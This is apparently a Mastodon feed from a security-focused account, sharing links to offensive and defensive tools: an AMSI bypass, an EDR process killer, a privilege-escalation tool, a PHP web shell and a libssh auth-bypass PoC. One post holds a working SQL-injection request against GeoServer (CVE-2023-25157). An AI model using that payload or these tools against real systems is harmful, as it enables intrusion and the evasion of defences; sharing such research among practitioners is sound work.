Plus récents
몾 Artemis

PE with spoofed sections

An undocumented trick to embed executable code within (what appears to be) a read-only PE section. The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers.

Nice, x86matthew. Ping @siri_urz

secret.club/2023/06/05/spoof-p

  • sample : https://secret.club/assets/pe_section_spoof/pe_section_spoof.zip
0
몾 Artemis

Abusing Microsoft SQL via ADSI

tarlogic.com/blog/linked-serve

0
몾 Artemis

CVE-2023-2283 PoC

Public key auth bypass in libssh

github.com/github/securitylab/

0
몾 Artemis

fakeAmsiDll.cpp

Simply return `S_OK / AMSI_RESULT_CLEAǸ for every command

gist.github.com/eversinc33/beb

0
몾 Artemis

ShellSweep.ps1

unit42.paloaltonetworks.com/th

0
몾 Artemis

🛠 nbutools

Tools for offensive security of NetBackup infrastructures

github.com/airbus-seclab/nbuto

0
몾 Artemis

Terminator

Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes

github.com/ZeroMemoryEx/Termin

0
몾 Artemis

DavRelayUp

An universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced

github.com/Dec0ne/DavRelayUp

0
몾 Artemis

PoC CVE-2023-25157 by @parzel

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true
0
몾 Artemis
  • ntrlmrelay.py_to_exe

github.com/LuemmelSec/ntrlmrel

0
몾 Artemis

🎸 Pinyo Kinyo r0x

0
몾 Artemis

ObjectWalker v2.1.6 by Rémi Gascou

module to explore the object tree to extract paths to interesting targets / objects in memory

github.com/p0dalirius/objectwa

0
몾 Artemis a partagé
Fabien LOISON (FLOZz)

✨️ New p0wny@shell release!

➡️ github.com/flozz/p0wny-shell

It now tries different execution functions (exec, shell_exec, system, passthru, popen, proc_open) to run commands to bypass disabled functions! 😎️

0
몾 Artemis
  • Process_String_Extractor.ps1

This scriplet is also able to extract Cookies for Microsoft O365 / Microsoft Azure PTC Attack

gist.github.com/LuemmelSec/3f2

0
몾 Artemis

A simple client for LOLDrivers

github.com/rtfmkiesel/loldrive

Afficher le fil de discussion
0
몾 Artemis

dpapi-ng v0.1.0

Python DPAPI NG Decryption Library

github.com/jborean93/dpapi-ng

0
몾 Artemis

​​LOLDrivers

Living Off The Land Drivers is a curated list of Microsoft Windows drivers used by adversaries

loldrivers.io

1
몾 Artemis

The game of chess is like a sword fight. You must think first, before you move.

0
몾 Artemis

hem-hashes

HIEW module to calc MD5, SHA-1 & SHA-256 hashes of a given file/block

github.com/merces/hem-hashes

0
몾 Artemis

Hunt-Weird-Syscalls

This project uses kernel based ETW providers to monitor for IOCs

github.com/thefLink/Hunt-Weird

0
Plus anciens
nanao

Comme le soleil, les machines ne se couchent jamais.

Ressources

Développeurs

Qu’est-ce que Mastodon ?

nanao.cybtex.fr

Davantage…